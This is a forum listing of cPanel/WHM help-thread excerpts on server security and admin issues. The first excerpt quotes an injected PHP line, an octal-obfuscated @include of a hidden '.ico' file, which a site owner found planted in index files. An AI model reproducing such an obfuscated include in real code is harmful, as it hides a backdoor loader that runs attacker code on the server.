security

Hello We have something that creates index files alone in files. Example <?php /ea2a0 / @include "\057home\057mzam\145er/p\165blic\137html\057Soun\144s/Al\055Jaze\145rah/\115oham\155ed_A\164eeq_\101l-Su\156awi/\056bfaf\06242b.\151co"; /ea2a0 / What solved this problem and where did it...

We've looked at all the similar posts regarding this error, but all of the discussions apply to using mod_ruid2 or mpm_itk. We are using mpm_prefork & lsapi. Customer complained about not being able to consistently access his cPanel portal without having to reload the page, and sometimes...

Can anyone help me? I have my own custom CSR but I'm not able to install it on cpanel.

Hi I would like to receive an email notification when a cpanel server needs a restart due to kernel update available? How can I enable that? Thanks

I am using GoDaddy as my hosting provider. I just upgraded my service from their Gen3 VPS to a Gen4 VPS. The Gen3 VPS came with `ConfigServ Security & Firewall` - that is not available in the new Centos 7.7 Gen4 VPS. In fact, it appears there is no default FW of any sort in my new Gen4 VPS...

Sir how can I improve my server speed and security ? My Server's sites are working too much slow , is Thier any idea to increase Thier speed ?

We are receiving this message: /bin/sh: line 0: cd: /usr/local/cpanel/whostmgr/docroot/cgi/fantastico/scripts/: No such file or directory I have been asked to look into this but it is not my bailiwick. I'm happy to do the work if someone can clue me in on how to reset the script. I did search...

i get this error when am performing some functions like editng .htaccess or wp-config and alot more. below is the error i get; HTTP error 401 Invalid security token The requested URL does not contain the correct security token for your session. The reason for this error may be that you copied...

Hello, I keep getting daily alerts for a WordPress installation, of which was originally created via cPanel, though no longer exists. Although it appears someone had deleted this by simply removing the physical files and database, cPanel must have a record somewhere through the Software...

I have Imunfy360 installed and CSF/LDF seem to be uninstalled. I see this message "CSF is installed, but LFD is not running" in the Security Advisor output. I realize the notice is not accurate and can be safely ignore it ( I double check for CSF/LDF via SSH, not installed ). Anything I can...

It looks cPanel Inc. is delivering GoogleTagmanager Script inside WHM. I see that as a security risk and dataprivacy issue, when a thirdparty script is injected in the WHM console of every server. (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new...

I host a bunch of websites that got infected due to an insecure WordPress management plugin (InfiniteWP). I have WHM/cPanel, and ImunifyAV+ and ConfigServer Exploit Scanner. Those have failed to fully remove the injected scripts. ImunifyAV+ has removed a bunch, but for some reason, not all...

Hi, Yesterday, I noticed that cron Jobs stopped working. /var/log/cron logs: crond[13653]: (root) FAILED to open PAM security session (Permission denied) crond[13860]: (root) PAM ERROR (Permission denied) crond[13861]: (myuser) PAM ERROR (Permission denied) crond[13861]: (myuser) FAILED to...

Just did cPanel upgrade to v80.0.9. Immediate issues I observed: 1) Security Advisor shows 'SSH direct root logins are permitted' and suggests 'Manually edit /etc/ssh/sshd_config and change PermitRootLogin to “without-password” or “no”, then restart SSH'. Note: my sshd_config was set to 'no'...

Hi all, at some point I had enabled the feature that will force cpanel users to change their passwords after 6 months. Now I can not find where this feature is located, as I want to disable it - well at least temporarily. Also, when I will restore back this feature, is it possible to apply it...

I also have a similar issue after updating the kernel Cron <[email protected]>/usr/bin/kcarectl --auto-update Unknown Kernel (CentOS Linux 3.10.0-957.1.3.el7.x86_64) EDIT: I have found this to be a kernelcare issue (not patched yet) and there's a post on their forum: Unknown Kernel (CentOS Linux...

cPanel Security Advisor no more showing about Kernel version info about update.

Tipically Security Advisor sends me email notices when there is a newer kernel available. If memory serves me, the kernel had not been been installed already and it was prompting me to run yum update and reboot. Pretty straightforward.... 1- Am I correct in assuming that upcp runs a yum update...

So I had a site on the server with the username 'security' (automatically supplied by the install program). After the latest update, it vanished. I reinstalled from backup but it does not show in the list. I tried installing it new but the site exists in the apache configuration file so the...

The system almost works, but I get the error in various places when logging into webmail and performing certain actions on WHM: HTTP error 401 Invalid Security Token Lots of XSRF errors in the console: Blocked a frame with origin "https://webmail.example.com" from accessing a frame with...